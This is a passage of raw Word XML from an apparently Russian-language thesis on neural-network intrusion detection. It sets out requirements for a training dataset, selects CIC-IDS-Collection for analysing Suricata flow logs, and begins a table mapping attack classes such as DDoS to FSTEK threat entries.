          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CA3A89" w14:textId="77777777" w:rsidR="006605C1" w:rsidRDefault="006605C1" w:rsidP="006605C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB533F1" w14:textId="77777777" w:rsidR="00B94753" w:rsidRDefault="00B94753" w:rsidP="006605C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D34E4AF" w14:textId="124F6875" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>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Таблица 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сновные требования к датасету</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9634" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4160"/>
        <w:gridCol w:w="5474"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="240D3B74" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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35B476" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F212D4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>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Требование</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5474" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4458F71F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F212D4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>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Обоснование</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="369F51C2" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AAE86CA"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Формат представления</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5474" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0475CF53"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Наличие информации на уровне сетевых потоков: статистики пакетов, длительность сессий, объёмы данных, флаги протоколов</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> для совместимости с модулем векторизации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="7F4A5790" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="900"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19105892"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Разметка классов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5474" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23228B65"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Наличие достоверных меток (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Normal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> и детализация по типам атак) для реализации классификации с учителем</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="052B43AC" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1401"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="620E2027"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Разнообразие угроз</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5474" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F46749" w14:textId="719970AE" w:rsidR="008E0171" w:rsidRPr="00F212D4" w:rsidRDefault="002A0DB3" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Минимально в</w:t>
            </w:r>
            <w:r w:rsidR="008E0171" w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ключение сценариев атак, соответствующих модели угроз из Таблицы 6 (Глава 1): УБИ.140, УБИ.153, УБИ.116, УБИ.186</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="7278FD1F" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="810"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67CFE364"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Актуальность протоколов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5474" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D535F3A"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Отражение современных сетевых протоколов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="25B31B79" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1407"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2693924A"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Качество данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5474" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="065FD676"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Отсутствие пропущенных значений в критических признаках, минимизация дубликатов, исключение признаков с утечкой целевой переменной</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="76194023" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6331CA0C"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Объём выборки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5474" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08210714"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Достаточное количество примеров для каждого класса (минимум 1000–5000 записей на тип угрозы) для предотвращения переобучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41BE6F8F"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41CA89B4" w14:textId="08643921"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8F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Анализ требований, представленных в таблице 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="008F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, позволяет сформировать критерии выбора подходящего набора данных для обучения нейросетевой модели. Ключевым фактором является наличие структурированных метаданных сетевых потоков, которые могут быть получены без анализа полезной нагрузки пакетов. Это соответствует архитектуре разрабатываемого модуля, ориентированного на обработку логов системы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F0FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F212D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На основании анализа требований, для формирования обучающей выборки в рамках данного исследования выбран набор данных CIC-IDS-Collection, разработанный Канадским институтом </w:t>
      </w:r>
      <w:r w:rsidR="002A0DB3" w:rsidRPr="00F212D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кибербезопасности</w:t>
      </w:r>
      <w:r w:rsidR="002A0DB3" w:rsidRPr="002A0DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="000C2219" w:rsidRPr="000C2219">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="002A0DB3" w:rsidRPr="002A0DB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D4FA50" w14:textId="1FA9153E" w:rsidR="00816679" w:rsidRDefault="008E0171" w:rsidP="00B94753">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F212D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Соответствие классов датасета актуальным угрозам ФСТЭК представлено </w:t>
      </w:r>
      <w:r w:rsidRPr="00816679">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00816679" w:rsidRPr="00816679">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="00816679">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>аблице</w:t>
      </w:r>
      <w:r w:rsidRPr="00F212D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F212D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2EE867" w14:textId="6CF12BF9" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>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Таблица 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нализ классов </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9776" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="2410"/>
        <w:gridCol w:w="2268"/>
        <w:gridCol w:w="3402"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="2A5D3383" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="750"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="169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96A352"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Класс в датасете</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2204237C"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Описание</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13D20359"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Соответствие угрозам ФСТЭК</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AD722C1"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Обоснование соответствия</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00F212D4" w14:paraId="7523F079" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="1410"/>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548DE38F"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F212D4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625FBCEA"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Атаки на отказ в обслуживании</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
